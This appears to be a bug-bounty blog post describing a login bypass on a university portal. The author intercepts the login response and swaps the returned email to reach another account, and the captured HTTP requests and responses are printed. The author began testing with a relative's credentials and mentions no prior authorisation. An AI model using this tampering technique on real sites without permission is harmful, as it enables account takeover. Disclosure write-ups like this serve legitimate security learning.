Photo by Jefferson Santos on Unsplash

How I found IDOR at a University Portal in 10 minutes!

Kapil Varma

--

As I was just messing up with my cousin’s Institute Portal, I noticed its login area and got curious to test its functionalities.

I got his credentials for that portal and intercepted its login request to Burpsuite. The request was given in the following format:

POST /login/process HTTP/1.1

Host: target.com

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0

Accept: application/json, text/plain, */*

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

router-path: /

Content-Type: application/json;charset=utf-8

Content-Length: 74

Origin: https://target.com

Connection: close

Referer: https://target.com/

Sec-Fetch-Dest: empty

Sec-Fetch-Mode: cors

Sec-Fetch-Site: same-site



{"uid":"attacker@outlook.com","pass":"Pass@123","dns":"target.com"}

After that, I captured its response to the request shown as above.

Following is given the response I got for the request:

HTTP/1.1 200 

Date: Thu, 19 Jan 2023 12:42:35 GMT

Content-Type: application/json;charset=UTF-8

Connection: close

Server: nginx/1.18.0

Vary: Origin

Vary: Access-Control-Request-Method

Vary: Access-Control-Request-Headers

Access-Control-Allow-Origin: *

Content-Length: 310



{"policy_read":true,"msg":"200","uid":"attacker@outlook.com","awspath":"https://(xxxx).amazonaws.com/","token":"somevalue3212"}

I noticed that the response includes the email along with a token.

Still who knows if that token is actually functioning?!!

So on my phone, I created another account on the same portal with a different email as “victim@outlook.com”.

After successfully registering it, I manipulated the response given above by replacing the email value of attacker with the email of the new victim account, hence after changes, the response will look like this:

HTTP/1.1 200 

Date: Thu, 19 Jan 2023 12:42:35 GMT

Content-Type: application/json;charset=UTF-8

Connection: close

Server: nginx/1.18.0

Vary: Origin

Vary: Access-Control-Request-Method

Vary: Access-Control-Request-Headers

Access-Control-Allow-Origin: *

Content-Length: 310

{"policy_read":true,"msg":"200","uid":"victim@outlook.com","awspath":"https://(xxxx).amazonaws.com/","token":"somevalue3212"}

I forwarded the manipulated response and guess what?!

I got logged in to the victim account!!

I understood that the token used here was of NO USE!!

I created a POC of the bug and reported it to the Institute.

The token made it seem like this won’t be possible, but uncertainity still exists, so we took the chance and it worked out ;)

Happy Hacking !!

#bugbounty #ethicalhacking #cybersecurity #vulnerability

--

--

Kapil Varma

A Cybersecurity Enthusiast, Ethical Hacker and Security Researcher